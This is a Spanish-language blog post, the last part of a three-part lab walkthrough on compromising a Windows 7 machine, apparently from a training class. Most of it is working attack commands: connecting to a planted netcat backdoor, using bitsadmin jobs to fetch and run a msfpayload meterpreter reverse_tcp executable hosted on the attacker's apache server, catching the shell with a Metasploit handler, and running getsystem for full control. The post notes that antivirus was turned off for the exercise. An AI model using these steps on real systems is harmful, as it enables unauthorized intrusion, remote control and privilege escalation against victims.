domingo, 12 de enero de 2014

Hackear Windows 7 con antivirus 3/3

Seguimos con el Hacking Windows 7 con antivirus, ver la parte 2 si no la has visto, esta ya es la 3 y ultima parte. Asi que Happy Hacking!!

Pero podemos ver todos los usuarios con: net user


También podemos ver gráficamente, inicio > botón derecho sobre equipo "Administrar" > Usuarios  y grupos locales > Usuarios
/*Necesitaríamos hacer otros cambios para ocultarlo en estos sitios*/

Ahora vamos a reiniciar a la victima para ver si todo funciona correctamente. Meterpreter pierde la conexion.

Una vez reiniciado veremos nuestra obra, para comprobar los cambios que hemos hecho.

Comprobamos que el UAC esta desactivado, para ello podemos clickar en cualquier archivo que necesite permisos de administrador para ejecutarse y no nos saldrá la ventana para aceptar.


Otra cosa interesante es probar comandos que antes teníamos con acceso denegado y ahora nos deja como es el caso de at, que es para ejecutar comandos a una hora determinada.


Ahora vamos a entrar por el backdoor que hemos creado.

Lo primero que hacemos es lanzar un nmap para comprobar el estado de nuestro puerto. nmap 192.168.1.43


Y ahora con netcat nos conectamos, nc -vv 192.168.1.43 12345


Ahora vamos a descargar una imagen de internet al ordenador de la victima 
bitsadmin /transfer mznlabsec /download /priority normal <enlace> C:\mznlabsec.jpg

Ahora vamos a conseguir una consola de meterpreter descargandolas de nuestro server.

Creamos un payload con msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=1234 X > /var/www/shell.exe
/*Esto lo detectaría el antivirus, para esta practica lo desactivamos*/

Lanzamos apache: service apache2 start

Creamos un trabajo al que añadiremos una o mas tareas para ejecutarlas con posterioridad: bitsadmin /create kali

Ahora añadimos la tarea a kali_linux: bitsadmin /addfile kali_linux http://192.168.1.67/shell.exe c:\Users\shell.exe

Y para ejecutarlo hacemos: bitsadmin /resume kali_linux

Podemos ver el estado de la ejecución introduciendo: bitsadmin /info kali_linux , y para verlo mas destallado bitsadmin /info kali_linux /verbose

Otra opción interesante con bitsadmin es ver los trabajos, para verlos usaremos: bitsadmin /list

Y para finalizar y ver el trabajo hacemos: bitsadmin /complete kali_linux

En nuestro Windows 7 ya aparece.

Pues ya que esta vamos a realizar una conexion a esta shell:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=1234 E

Ahora desde nuestra shell de windows, nos ponemos en la ruta y ejecutamos con: shell.exe 

Y ahora ya realiza la conexion y obtenemos la shell de meterpreter.

Ahora ya podemos ejecutar un getsystem y seremos los jefes del equipo.


Agradecer a Rodolfo Ceceña y Backtrack Academy por esta fantástica clase. Se aprende mucho con estas clases practicas.

Saludos guerreros y Happy Hacking!!

No hay comentarios:

Publicar un comentario